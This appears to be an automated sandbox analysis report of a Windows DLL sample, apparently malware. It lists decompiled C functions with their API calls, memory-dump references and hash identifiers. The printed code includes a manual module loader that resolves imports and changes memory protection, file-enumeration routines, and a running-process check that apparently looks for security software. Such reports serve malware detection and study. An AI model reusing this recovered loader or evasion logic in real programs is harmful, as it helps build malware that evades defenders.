                                          Function 00C77BA9, Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 34%
                                          			E00C77BA9(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v12;
				void* _v18;
				char _v20;
				intOrPtr _t15;
				void* _t17;
				intOrPtr _t19;
				void* _t23;

				_v20 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t15 =  *0xc7d2a4; // 0x24ba5a8
				_t4 = _t15 + 0xc7e39c; // 0x3138944
				_t20 = _t4;
				_t6 = _t15 + 0xc7e124; // 0x650047
				_t17 = E00C7642C(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
				if(_t17 < 0) {
					_t23 = _t17;
				} else {
					_t23 = 8;
					if(_v20 != _t23) {
						_t23 = 1;
					} else {
						_t19 = E00C74CD3(_t20, _v12);
						if(_t19 != 0) {
							 *_a16 = _t19;
							_t23 = 0;
						}
						__imp__#6(_v12);
					}
				}
				return _t23;
			}










                                          0x00c77bb3
                                          0x00c77bba
                                          0x00c77bbb
                                          0x00c77bbc
                                          0x00c77bbd
                                          0x00c77bc3
                                          0x00c77bc8
                                          0x00c77bc8
                                          0x00c77bd2
                                          0x00c77be4
                                          0x00c77beb
                                          0x00c77c19
                                          0x00c77bed
                                          0x00c77bef
                                          0x00c77bf4
                                          0x00c77c16
                                          0x00c77bf6
                                          0x00c77bf9
                                          0x00c77c00
                                          0x00c77c05
                                          0x00c77c07
                                          0x00c77c07
                                          0x00c77c0c
                                          0x00c77c0c
                                          0x00c77bf4
                                          0x00c77c20

                                          APIs
                                            • Part of subcall function 00C7642C: SysFreeString.OLEAUT32(?), ref: 00C7650B
                                            • Part of subcall function 00C74CD3: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,00C7358E,004F0053,00000000,?), ref: 00C74CDC
                                            • Part of subcall function 00C74CD3: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,00C7358E,004F0053,00000000,?), ref: 00C74D06
                                            • Part of subcall function 00C74CD3: memset.NTDLL ref: 00C74D1A
                                          • SysFreeString.OLEAUT32(00000000), ref: 00C77C0C
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.521464434.0000000000C71000.00000020.00020000.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000000.00000002.521417156.0000000000C70000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521608440.0000000000C7C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521660982.0000000000C7D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521724199.0000000000C7F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c70000_loaddll32.jbxd
                                          Similarity
                                          • API ID: FreeString$lstrlenmemcpymemset
                                          • String ID:
                                          • API String ID: 397948122-0
                                          • Opcode ID: f9418f446cdc72fe6c08fbbe400a61af9cb4f59514cf86c8d1d6d3e1eb3a7f19
                                          • Instruction ID: 5e07a2599f7e4f0ccd16257b70b21423f0bd846cd4f53668d979df3bc1f2dfd1
                                          • Opcode Fuzzy Hash: f9418f446cdc72fe6c08fbbe400a61af9cb4f59514cf86c8d1d6d3e1eb3a7f19
                                          • Instruction Fuzzy Hash: B201B13250001ABFDB129FA4CD01AAEBBB8FF08340F0085A5EA09E7021E371DE52DBD0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 005F1000, Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 37%
                                          			E005F1000(void* __eax, intOrPtr _a4) {

				 *0x5f4150 =  *0x5f4150 & 0x00000000;
				_push(0);
				_push(0x5f414c);
				_push(1);
				_push(_a4);
				 *0x5f4148 = 0xc; // executed
				L005F11CE(); // executed
				return __eax;
			}



                                          0x005f1000
                                          0x005f1007
                                          0x005f1009
                                          0x005f100e
                                          0x005f1010
                                          0x005f1014
                                          0x005f101e
                                          0x005f1023

                                          APIs
                                          • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(005F1711,00000001,005F414C,00000000), ref: 005F101E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.519649525.00000000005F0000.00000040.00020000.sdmp, Offset: 005F0000, based on PE: true
                                          • Associated: 00000000.00000002.519749348.00000000005F5000.00000040.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.519817057.00000000005F7000.00000040.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5f0000_loaddll32.jbxd
                                          Similarity
                                          • API ID: DescriptorSecurity$ConvertString
                                          • String ID:
                                          • API String ID: 3907675253-0
                                          • Opcode ID: 869847357438fa8271a3bfb9ea6a9f5fa3a90d965ecd2249cb9f46b2e222c937
                                          • Instruction ID: f89a6c558bc71fe9aaaf186e7cf5a32e84a462ccf44e732b50f1ed74e15c3f3c
                                          • Opcode Fuzzy Hash: 869847357438fa8271a3bfb9ea6a9f5fa3a90d965ecd2249cb9f46b2e222c937
                                          • Instruction Fuzzy Hash: 1AC04C74240345A6E620AF409C4AF677E917771B05F110505B310651E193FE1098ED19
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00C758BE, Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00C758BE(long _a4) {
				void* _t2;

				_t2 = RtlAllocateHeap( *0xc7d238, 0, _a4); // executed
				return _t2;
			}




                                          0x00c758ca
                                          0x00c758d0

                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000000,-00000008,00C71C51), ref: 00C758CA
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.521464434.0000000000C71000.00000020.00020000.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000000.00000002.521417156.0000000000C70000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521608440.0000000000C7C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521660982.0000000000C7D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521724199.0000000000C7F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c70000_loaddll32.jbxd
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          • Opcode ID: cab64ef76c902621fd2667ac9cae75e981fed04e504ed13ad85ccc5838c9c053
                                          • Instruction ID: 8813f7ee4b84a03c7fa1bb108629740d9959fb66347b6f9933080d462a005181
                                          • Opcode Fuzzy Hash: cab64ef76c902621fd2667ac9cae75e981fed04e504ed13ad85ccc5838c9c053
                                          • Instruction Fuzzy Hash: 43B01231000100EBCB014B00DD08F0DBB31AF50700F018014B20904070873148E1EB15
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 005F1ADC, Relevance: 1.3, APIs: 1, Instructions: 66COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 84%
                                          			E005F1ADC(void* __eax) {
				char _v8;
				void* _v12;
				void* _t17;
				long _t25;
				long _t28;
				intOrPtr* _t33;
				void* _t34;
				intOrPtr* _t35;
				intOrPtr _t37;

				_t34 = __eax;
				_t17 = E005F1F61( &_v8,  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) + 0x00000fff & 0xfffff000,  &_v8,  &_v12); // executed
				if(_t17 != 0) {
					_t28 = 8;
					goto L8;
				} else {
					_t33 = _v8;
					_t28 = E005F1CE4( &_v8, _t33, _t34);
					if(_t28 == 0) {
						_t37 =  *((intOrPtr*)(_t33 + 0x3c)) + _t33;
						_t28 = E005F15C2(_t33, _t37);
						if(_t28 == 0) {
							_t25 = E005F1EB4(_t37, _t33); // executed
							_t28 = _t25;
							if(_t28 == 0) {
								_push(_t25);
								_push(1);
								_push(_t33);
								if( *((intOrPtr*)( *((intOrPtr*)(_t37 + 0x28)) + _t33))() == 0) {
									_t28 = GetLastError();
								}
							}
						}
					}
					_t35 = _v12;
					 *((intOrPtr*)(_t35 + 0x18))( *((intOrPtr*)(_t35 + 0x1c))( *_t35));
					E005F1938(_t35);
					L8:
					return _t28;
				}
			}












                                          0x005f1ae4
                                          0x005f1b01
                                          0x005f1b08
                                          0x005f1b67
                                          0x00000000
                                          0x005f1b0a
                                          0x005f1b0a
                                          0x005f1b14
                                          0x005f1b18
                                          0x005f1b1d
                                          0x005f1b26
                                          0x005f1b2a
                                          0x005f1b2f
                                          0x005f1b34
                                          0x005f1b38
                                          0x005f1b3d
                                          0x005f1b3e
                                          0x005f1b42
                                          0x005f1b47
                                          0x005f1b4f
                                          0x005f1b4f
                                          0x005f1b47
                                          0x005f1b38
                                          0x005f1b2a
                                          0x005f1b51
                                          0x005f1b5a
                                          0x005f1b5e
                                          0x005f1b68
                                          0x005f1b6e
                                          0x005f1b6e

                                          APIs
                                            • Part of subcall function 005F1F61: GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,?,005F1B06,?,?,?,?,00000002,?,?), ref: 005F1F86
                                            • Part of subcall function 005F1F61: GetProcAddress.KERNEL32(00000000,?), ref: 005F1FA8
                                            • Part of subcall function 005F1F61: GetProcAddress.KERNEL32(00000000,?), ref: 005F1FBE
                                            • Part of subcall function 005F1F61: GetProcAddress.KERNEL32(00000000,?), ref: 005F1FD4
                                            • Part of subcall function 005F1F61: GetProcAddress.KERNEL32(00000000,?), ref: 005F1FEA
                                            • Part of subcall function 005F1F61: GetProcAddress.KERNEL32(00000000,?), ref: 005F2000
                                            • Part of subcall function 005F1CE4: memcpy.NTDLL(00000002,?,?,?,?,?,?,?,005F1B14,?,?,?,?,?,?,00000002), ref: 005F1D1B
                                            • Part of subcall function 005F1CE4: memcpy.NTDLL(00000002,?,?,?,00000002), ref: 005F1D50
                                            • Part of subcall function 005F15C2: LoadLibraryA.KERNEL32(?,?,?,00000000,?,?,?,00000002), ref: 005F15F8
                                            • Part of subcall function 005F15C2: lstrlenA.KERNEL32(?), ref: 005F160E
                                            • Part of subcall function 005F15C2: memset.NTDLL ref: 005F1618
                                            • Part of subcall function 005F15C2: GetProcAddress.KERNEL32(?,00000002), ref: 005F167B
                                            • Part of subcall function 005F15C2: lstrlenA.KERNEL32(-00000002), ref: 005F1690
                                            • Part of subcall function 005F15C2: memset.NTDLL ref: 005F169A
                                            • Part of subcall function 005F1EB4: VirtualProtect.KERNELBASE(00000000,?,00000004,?,?,?,00000000,?,?), ref: 005F1EE2
                                            • Part of subcall function 005F1EB4: VirtualProtect.KERNELBASE(00000000,00000000,00000004,?), ref: 005F1F3A
                                            • Part of subcall function 005F1EB4: GetLastError.KERNEL32 ref: 005F1F40
                                          • GetLastError.KERNEL32(?,?), ref: 005F1B49
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.519649525.00000000005F0000.00000040.00020000.sdmp, Offset: 005F0000, based on PE: true
                                          • Associated: 00000000.00000002.519749348.00000000005F5000.00000040.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.519817057.00000000005F7000.00000040.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5f0000_loaddll32.jbxd
                                          Similarity
                                          • API ID: AddressProc$ErrorLastProtectVirtuallstrlenmemcpymemset$HandleLibraryLoadModule
                                          • String ID:
                                          • API String ID: 33504255-0
                                          • Opcode ID: fa3752f4a824a897bf6938da4807c7288813f1b29a378ab5bcfe7389cc4f34dd
                                          • Instruction ID: 7e71a023ad08cbb27f2038b00416e2bd7392a77aeb056bb19bdade405e365b57
                                          • Opcode Fuzzy Hash: fa3752f4a824a897bf6938da4807c7288813f1b29a378ab5bcfe7389cc4f34dd
                                          • Instruction Fuzzy Hash: 6711A072600B19EBD72167A58C89DBB7FACBF54714B000165FB05D3245FA68ED0587A8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00C79347, Relevance: 1.3, APIs: 1, Instructions: 57memoryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 70%
                                          			E00C79347(void* __ecx, signed char* _a4) {
				void* _v8;
				void* _t8;
				signed short _t11;
				signed int _t12;
				signed int _t14;
				intOrPtr _t15;
				void* _t19;
				signed short* _t22;
				void* _t24;
				intOrPtr* _t27;

				_t24 = 0;
				_push(0);
				_t19 = 1;
				_t27 = 0xc7d330;
				E00C7684E();
				while(1) {
					_t8 = E00C732BA(_a4,  &_v8); // executed
					if(_t8 == 0) {
						break;
					}
					_push(_v8);
					_t14 = 0xd;
					_t15 = E00C7A5E9(_t14);
					if(_t15 == 0) {
						HeapFree( *0xc7d238, 0, _v8);
						break;
					} else {
						 *_t27 = _t15;
						_t27 = _t27 + 4;
						_t24 = _t24 + 1;
						if(_t24 < 3) {
							continue;
						} else {
						}
					}
					L7:
					_push(1);
					E00C7684E();
					if(_t19 != 0) {
						_t22 =  *0xc7d338; // 0x3139b58
						_t11 =  *_t22 & 0x0000ffff;
						if(_t11 < 0x61 || _t11 > 0x7a) {
							_t12 = _t11 & 0x0000ffff;
						} else {
							_t12 = (_t11 & 0x0000ffff) - 0x20;
						}
						 *_t22 = _t12;
					}
					return _t19;
				}
				_t19 = 0;
				goto L7;
			}













                                          0x00c7934f
                                          0x00c79353
                                          0x00c79354
                                          0x00c79355
                                          0x00c7935a
                                          0x00c7935f
                                          0x00c79366
                                          0x00c7936d
                                          0x00000000
                                          0x00000000
                                          0x00c7936f
                                          0x00c79374
                                          0x00c79375
                                          0x00c7937c
                                          0x00c79396
                                          0x00000000
                                          0x00c7937e
                                          0x00c7937e
                                          0x00c79380
                                          0x00c79383
                                          0x00c79387
                                          0x00000000
                                          0x00000000
                                          0x00c79389
                                          0x00c79387
                                          0x00c7939e
                                          0x00c7939e
                                          0x00c793a0
                                          0x00c793a7
                                          0x00c793a9
                                          0x00c793af
                                          0x00c793b6
                                          0x00c793c6
                                          0x00c793be
                                          0x00c793c1
                                          0x00c793c1
                                          0x00c793c9
                                          0x00c793c9
                                          0x00c793d2
                                          0x00c793d2
                                          0x00c7939c
                                          0x00000000

                                          APIs
                                            • Part of subcall function 00C7684E: GetProcAddress.KERNEL32(36776F57,00C7935F), ref: 00C76869
                                            • Part of subcall function 00C732BA: RtlAllocateHeap.NTDLL(00000000,59935A40,00000000), ref: 00C732E5
                                            • Part of subcall function 00C732BA: RtlAllocateHeap.NTDLL(00000000,59935A40), ref: 00C73307
                                            • Part of subcall function 00C732BA: memset.NTDLL ref: 00C73321
                                            • Part of subcall function 00C732BA: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 00C7335F
                                            • Part of subcall function 00C732BA: GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 00C73373
                                            • Part of subcall function 00C732BA: FindCloseChangeNotification.KERNEL32(00000000), ref: 00C7338A
                                            • Part of subcall function 00C732BA: StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 00C73396
                                            • Part of subcall function 00C732BA: lstrcat.KERNEL32(?,642E2A5C), ref: 00C733D7
                                            • Part of subcall function 00C732BA: FindFirstFileA.KERNEL32(?,?), ref: 00C733ED
                                            • Part of subcall function 00C7A5E9: lstrlen.KERNEL32(?,00000000,00C7D330,00000001,00C7937A,00C7D00C,00C7D00C,00000000,00000005,00000000,00000000,?,?,?,00C7207E,?), ref: 00C7A5F2
                                            • Part of subcall function 00C7A5E9: mbstowcs.NTDLL ref: 00C7A619
                                            • Part of subcall function 00C7A5E9: memset.NTDLL ref: 00C7A62B
                                          • HeapFree.KERNEL32(00000000,00C7D00C,00C7D00C,00C7D00C,00000000,00000005,00000000,00000000,?,?,?,00C7207E,?,00C7D00C,?,?), ref: 00C79396
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.521464434.0000000000C71000.00000020.00020000.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000000.00000002.521417156.0000000000C70000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521608440.0000000000C7C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521660982.0000000000C7D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521724199.0000000000C7F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c70000_loaddll32.jbxd
                                          Similarity
                                          • API ID: FileHeap$AllocateFindmemset$AddressChangeCloseCreateFirstFreeNotificationProcTimelstrcatlstrlenmbstowcs
                                          • String ID:
                                          • API String ID: 983081259-0
                                          • Opcode ID: f3238226b32c22504ecb1dde6dba549c74c453664e4a61a1597973304383c2c3
                                          • Instruction ID: ad84367b9add389c535949bd760a29ce9c1922c4a542b940195db31465d65dba
                                          • Opcode Fuzzy Hash: f3238226b32c22504ecb1dde6dba549c74c453664e4a61a1597973304383c2c3
                                          • Instruction Fuzzy Hash: 17014732200206AAEB105FE7CD81B7EBAB9EF45364F109036F94DC60F0D670CD82A362
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00C71B13, Relevance: 1.3, APIs: 1, Instructions: 42memoryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00C71B13(void** __edi, intOrPtr _a4, unsigned int _a8, void* _a12) {
				void* _t15;
				void* _t21;
				signed int _t23;
				void* _t26;

				if(_a4 != 0) {
					_t15 = E00C77BA9(_a4, _a8, _a12, __edi); // executed
					_t26 = _t15;
				} else {
					_t26 = E00C774B9(0, 0x80000002, _a8, _a12,  &_a12,  &_a8);
					if(_t26 == 0) {
						_t23 = _a8 >> 1;
						if(_t23 == 0) {
							_t26 = 2;
							HeapFree( *0xc7d238, 0, _a12);
						} else {
							_t21 = _a12;
							 *((short*)(_t21 + _t23 * 2 - 2)) = 0;
							 *__edi = _t21;
						}
					}
				}
				return _t26;
			}







                                          0x00c71b1b
                                          0x00c71b72
                                          0x00c71b77
                                          0x00c71b1d
                                          0x00c71b37
                                          0x00c71b3b
                                          0x00c71b40
                                          0x00c71b42
                                          0x00c71b54
                                          0x00c71b60
                                          0x00c71b44
                                          0x00c71b44
                                          0x00c71b49
                                          0x00c71b4e
                                          0x00c71b4e
                                          0x00c71b42
                                          0x00c71b3b
                                          0x00c71b7d

                                          APIs
                                          • HeapFree.KERNEL32(00000000,?,00000000,80000002,7519F710,?,?,7519F710,00000000,?,00C7690C,?,004F0053,03139388,00000000,?), ref: 00C71B60
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.521464434.0000000000C71000.00000020.00020000.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000000.00000002.521417156.0000000000C70000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521608440.0000000000C7C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521660982.0000000000C7D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521724199.0000000000C7F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c70000_loaddll32.jbxd
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID:
                                          • API String ID: 3298025750-0
                                          • Opcode ID: e9428b28f23e8f857c974a7a85d96038eecfd938edef5c9b17be1907429414a8
                                          • Instruction ID: 86ad1355973e5336482c80709164f698c7e446dd1f26e65fecb8bbab98f073d2
                                          • Opcode Fuzzy Hash: e9428b28f23e8f857c974a7a85d96038eecfd938edef5c9b17be1907429414a8
                                          • Instruction Fuzzy Hash: 2A016D72100209FBCB219FA9DC01FAE3B69FF14360F08C129FE1D9A160E7308960EB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00C7A872, Relevance: 1.3, APIs: 1, Instructions: 36sleepCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 88%
                                          			E00C7A872(intOrPtr* __edi) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _t15;
				intOrPtr* _t21;

				_t21 = __edi;
				_push( &_v12);
				_push(__edi);
				_v8 = 0x1d4c0;
				_t15 =  *((intOrPtr*)( *__edi + 0xe0))();
				while(1) {
					_v16 = _t15;
					Sleep(0x1f4); // executed
					if(_v12 == 4) {
						break;
					}
					if(_v8 == 0) {
						L4:
						_t15 =  *((intOrPtr*)( *_t21 + 0xe0))(_t21,  &_v12);
						continue;
					} else {
						if(_v8 <= 0x1f4) {
							_v16 = 0x80004004;
						} else {
							_v8 = _v8 - 0x1f4;
							goto L4;
						}
					}
					L8:
					return _v16;
				}
				goto L8;
			}








                                          0x00c7a872
                                          0x00c7a87f
                                          0x00c7a880
                                          0x00c7a881
                                          0x00c7a888
                                          0x00c7a8b6
                                          0x00c7a8b7
                                          0x00c7a8ba
                                          0x00c7a8c0
                                          0x00000000
                                          0x00000000
                                          0x00c7a89f
                                          0x00c7a8a9
                                          0x00c7a8b0
                                          0x00000000
                                          0x00c7a8a1
                                          0x00c7a8a4
                                          0x00c7a8c4
                                          0x00c7a8a6
                                          0x00c7a8a6
                                          0x00000000
                                          0x00c7a8a6
                                          0x00c7a8a4
                                          0x00c7a8cb
                                          0x00c7a8d1
                                          0x00c7a8d1
                                          0x00000000

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.521464434.0000000000C71000.00000020.00020000.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000000.00000002.521417156.0000000000C70000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521608440.0000000000C7C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521660982.0000000000C7D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521724199.0000000000C7F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c70000_loaddll32.jbxd
                                          Similarity
                                          • API ID: Sleep
                                          • String ID:
                                          • API String ID: 3472027048-0
                                          • Opcode ID: 9bf0fabc45dc8057184e6fee7940bb1ab45ac79b6fd8234af66d8f58e2d6fd2f
                                          • Instruction ID: e137a305f1c0335e6e275fa321b4e6ec308290dd7403096965881608d7669adb
                                          • Opcode Fuzzy Hash: 9bf0fabc45dc8057184e6fee7940bb1ab45ac79b6fd8234af66d8f58e2d6fd2f
                                          • Instruction Fuzzy Hash: 88F0E775D01218EFDB00DB95C988AEDB7B8EF44304F1484AAE516A3280D7B46B85DF57
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00C71BC1, Relevance: 1.3, APIs: 1, Instructions: 24stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • lstrlenW.KERNEL32(00C7553C,?,?,00C7A818,3D00C7C0,80000002,00C7553C,00C79642,74666F53,4D4C4B48,00C79642,?,3D00C7C0,80000002,00C7553C,?), ref: 00C71BE1
                                            • Part of subcall function 00C76C68: SysAllocString.OLEAUT32(00C79642), ref: 00C76C81
                                            • Part of subcall function 00C76C68: SysFreeString.OLEAUT32(00000000), ref: 00C76CC2
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.521464434.0000000000C71000.00000020.00020000.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000000.00000002.521417156.0000000000C70000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521608440.0000000000C7C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521660982.0000000000C7D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521724199.0000000000C7F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c70000_loaddll32.jbxd
                                          Similarity
                                          • API ID: String$AllocFreelstrlen
                                          • String ID:
                                          • API String ID: 3808004451-0
                                          • Opcode ID: 12ab82a63a90a543121fa6f1f76c21d6d36a3fc307d4a122f8c27aacb4491a5c
                                          • Instruction ID: e5ea4bd9949986f8232b64e0cee59dc61907dec13153bcaa285cb1b5fad080fb
                                          • Opcode Fuzzy Hash: 12ab82a63a90a543121fa6f1f76c21d6d36a3fc307d4a122f8c27aacb4491a5c
                                          • Instruction Fuzzy Hash: F7E0457200420EFFDF125F91DC46E9A3B6AFB04354F148115FA1815061D77295B0ABA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00C760CF, Relevance: 1.3, APIs: 1, Instructions: 23COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00C760CF(void* __edx, void* __edi, void* _a4) {
				int _t7;
				int _t13;

				_t7 = E00C77A28(__edx, __edi, _a4,  &_a4); // executed
				_t13 = _t7;
				if(_t13 != 0) {
					memcpy(__edi, _a4, _t13);
					 *((char*)(__edi + _t13)) = 0;
					E00C7147E(_a4);
				}
				return _t13;
			}





                                          0x00c760db
                                          0x00c760e0
                                          0x00c760e4
                                          0x00c760eb
                                          0x00c760f6
                                          0x00c760fa
                                          0x00c760fa
                                          0x00c76103

                                          APIs
                                            • Part of subcall function 00C77A28: memcpy.NTDLL(00000000,00000090,?,?,?,00000008), ref: 00C77A5E
                                            • Part of subcall function 00C77A28: memset.NTDLL ref: 00C77AD3
                                            • Part of subcall function 00C77A28: memset.NTDLL ref: 00C77AE7
                                          • memcpy.NTDLL(?,?,00000000,?,?,?,?,?,00C79F9F,?,?,00C79C62,00000002,?,?,?), ref: 00C760EB
                                            • Part of subcall function 00C7147E: HeapFree.KERNEL32(00000000,00000000,00C71D11,00000000,?,?,-00000008), ref: 00C7148A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.521464434.0000000000C71000.00000020.00020000.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000000.00000002.521417156.0000000000C70000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521608440.0000000000C7C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521660982.0000000000C7D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521724199.0000000000C7F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c70000_loaddll32.jbxd
                                          Similarity
                                          • API ID: memcpymemset$FreeHeap
                                          • String ID:
                                          • API String ID: 3053036209-0
                                          • Opcode ID: f2b2b8ba8929acc20bdd7dadbc9947bfae244f1e76b9b7981e545fa298f64d36
                                          • Instruction ID: d8c2e6c2fcacaedb09ef4dd91e7712316b6931e6da3850268f7e755eda11cecd
                                          • Opcode Fuzzy Hash: f2b2b8ba8929acc20bdd7dadbc9947bfae244f1e76b9b7981e545fa298f64d36
                                          • Instruction Fuzzy Hash: 01E08C725001297BCB222A98DC01DEF7F5C8F527A1F048020FE0CAA216DA32CA10A7E1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          Function 00C756A2, Relevance: 6.0, APIs: 4, Instructions: 41processCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 68%
                                          			E00C756A2() {
				char _v264;
				void* _v300;
				int _t8;
				intOrPtr _t9;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t17 = CreateToolhelp32Snapshot(2, 0);
				if(_t17 != 0) {
					_t8 = Process32First(_t17,  &_v300);
					while(_t8 != 0) {
						_t9 =  *0xc7d2a4; // 0x24ba5a8
						_t2 = _t9 + 0xc7ee38; // 0x73617661
						_push( &_v264);
						if( *0xc7d0fc() != 0) {
							_t15 = 1;
						} else {
							_t8 = Process32Next(_t17,  &_v300);
							continue;
						}
						L7:
						CloseHandle(_t17);
						goto L8;
					}
					goto L7;
				}
				L8:
				return _t15;
			}









                                          0x00c756ad
                                          0x00c756b7
                                          0x00c756bb
                                          0x00c756c5
                                          0x00c756f6
                                          0x00c756cc
                                          0x00c756d1
                                          0x00c756de
                                          0x00c756e7
                                          0x00c756fe
                                          0x00c756e9
                                          0x00c756f1
                                          0x00000000
                                          0x00c756f1
                                          0x00c756ff
                                          0x00c75700
                                          0x00000000
                                          0x00c75700
                                          0x00000000
                                          0x00c756fa
                                          0x00c75706
                                          0x00c7570b

                                          APIs
                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00C756B2
                                          • Process32First.KERNEL32(00000000,?), ref: 00C756C5
                                          • Process32Next.KERNEL32(00000000,?), ref: 00C756F1
                                          • CloseHandle.KERNEL32(00000000), ref: 00C75700
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.521464434.0000000000C71000.00000020.00020000.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000000.00000002.521417156.0000000000C70000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521608440.0000000000C7C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521660982.0000000000C7D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521724199.0000000000C7F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c70000_loaddll32.jbxd
                                          Similarity
                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                          • String ID:
                                          • API String ID: 420147892-0
                                          • Opcode ID: 31e2a9022a92c4dc618bcd6442be8284fdac1a66c51dc47e5e1f57399b0acf86
                                          • Instruction ID: 7475d02e911586eb14dabc9c63efc86eb62ee123da18155dd7be9c7d4cdeb860
                                          • Opcode Fuzzy Hash: 31e2a9022a92c4dc618bcd6442be8284fdac1a66c51dc47e5e1f57399b0acf86
                                          • Instruction Fuzzy Hash: CDF0BB726015659AD720A7369C49FEF76ACDFC5310F008051FD1ED3141E660DE8686A5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 005F179C, Relevance: 6.0, APIs: 4, Instructions: 40COMMON
                                          Download Yara Rule
